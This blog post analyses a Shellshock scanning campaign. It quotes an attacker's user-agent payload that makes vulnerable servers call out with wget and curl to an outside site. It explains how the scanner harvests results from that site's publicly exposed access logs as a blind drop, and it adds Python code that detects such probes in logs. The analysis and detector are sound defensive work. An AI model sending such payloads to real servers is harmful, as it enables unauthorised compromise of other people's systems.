
Indirect shellshock scanning through public logfiles

One of my friends noted that he’d spotted a shellshock-style user-agent string in his web log files, looking like:

24.71.248.218 - - [28/Apr/2016:16:55:30 -0500] "GET / HTTP/1.1" 403 4961 "-" "() { :; }; /bin/sh -c 'wget http://closettransfer.com/IPTRANSITTEST -O /dev/null;wget1 http://closettransfer.com/IPTRANSITTEST -O /dev/null;curl http://closettransfer.com/IPTRANSITTEST -o /dev/null;/usr/sfwbin/wget http://closettransfer.com/IPTRANSITTEST;fetch -/dev/null http://closettransfer.com/IPTRANSITTEST'"

Curious about whether it was a legitimate domain (perhaps owned), I googled the domain name:

[image: Indirect shellshock scanning through public logfiles]

Seasonally-appropriate designer labels.  Doesn’t really seem like the kind of thing a white-hat security scanner would be pretending to be.  Was the domain compromised and I should try to notify them? Hmm.  What the heck – try to download the page:

--2016-04-30 13:38:26--  http://closettransfer.com/IPTRANSITTEST
Resolving closettransfer.com (closettransfer.com)... 98.138.19.143
Connecting to closettransfer.com (closettransfer.com)|98.138.19.143|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2016-04-30 13:38:26 ERROR 404: Not Found.

They weren’t sending a malicious payload – and the scanning had sent the results to /dev/null anyway.  Googling IPTRANSITTEST turned up a few hits in other people’s logfiles… wait a second.  Logfiles.  What if closettransfer.com had left its logfiles visible in some way, and an attacker was using this as a blind drop to find the results of their scanning without needing to collect any data back from the scanning nodes?

My first guess proved startlingly lucky:

[image: Indirect shellshock scanning through public logfiles]

Looking at the contents of one access log, quite a few IP addresses have downloaded the logfiles themselves, so I didn’t dig further.

It’s pretty clear, though, what happened:  These logfiles are easily found via a bit of "Google-scanning":

[image: Indirect shellshock scanning through public logfiles]

Having located an accessible drop-box to collect the results, someone recruited a set of nodes to scan lots of websites with a custom user-agent.  By using the drop-box, these nodes never need to contact the controller / response collector: they're completely fire-and-forget, and so could be distributed as malware or in a host of other ways.  At some point the controller wants to collect the entries, and can simply download the raw access logs over Tor, finding all sorts of juicy entries like:


XXX.XXX.XXX.XXX [30/Apr/2016:09:25:12 -0700] "GET /IPTRANSITTEST HTTP/1.1" 404 73 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.19.1 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2" "closettransfer.com"

Clever.
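Both halves of the pattern can be spotted from access logs. The Python below is an added example, not code from the post: it flags Shellshock-style user-agents on a scanned server and extracts the beacon hosts they name, and it counts hits on the marker path the way the drop-box's own log would show them. The log lines are constructed (the first reuses the post's user-agent, the rest use RFC 5737 documentation addresses) and are assumed to be in Apache combined format.

```python
import re
from collections import Counter

# Apache "combined" log format, the format of the post's samples.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Shellshock trigger: a bash function definition "() {" at the start of the header
# value, with the commands to run appended after the closing brace.
SHELLSHOCK_RE = re.compile(r'^\s*\(\)\s*\{')
URL_RE = re.compile(r'https?://[^\s\'";]+')

# Constructed sample: line 1 reuses the post's user-agent, the rest use documentation IPs.
SAMPLE_LOG = [
    '24.71.248.218 - - [28/Apr/2016:16:55:30 -0500] "GET / HTTP/1.1" 403 4961 "-" '
    '"() { :; }; /bin/sh -c \'wget http://closettransfer.com/IPTRANSITTEST -O /dev/null;'
    'curl http://closettransfer.com/IPTRANSITTEST -o /dev/null\'"',
    '203.0.113.7 - - [28/Apr/2016:17:01:02 -0500] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/45.0"',
    # What the drop-box's own log shows: each server that ran the command fetches the marker.
    '198.51.100.10 - - [30/Apr/2016:09:25:12 -0700] "GET /IPTRANSITTEST HTTP/1.1" 404 73 "-" '
    '"curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7"',
    '198.51.100.11 - - [30/Apr/2016:09:26:40 -0700] "GET /IPTRANSITTEST HTTP/1.1" 404 73 "-" '
    '"Wget/1.12 (linux-gnu)"',
    '198.51.100.10 - - [30/Apr/2016:09:27:05 -0700] "GET /IPTRANSITTEST HTTP/1.1" 404 73 "-" '
    '"curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7"',
]

def parse_combined(line):
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None

def shellshock_probes(lines):
    """(source IP, sorted hosts named in the UA) for each Shellshock-style request.
    The hosts are where a vulnerable server would have sent its beacon."""
    hits = []
    for rec in filter(None, map(parse_combined, lines)):
        if SHELLSHOCK_RE.search(rec["ua"]):
            hosts = sorted({u.split("/")[2] for u in URL_RE.findall(rec["ua"])})
            hits.append((rec["ip"], hosts))
    return hits

def dropbox_beacons(lines, marker_path):
    """Hits on the marker path per source IP. Many distinct IPs requesting one
    otherwise-nonexistent path is the drop-box signature described in the post."""
    return Counter(rec["ip"] for rec in filter(None, map(parse_combined, lines))
                   if rec["path"] == marker_path)
```

On a scanned server the first function tells you which host to look for in your own outbound traffic; on the drop-box side the second shows the scan results leaking through a plain 404 log.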
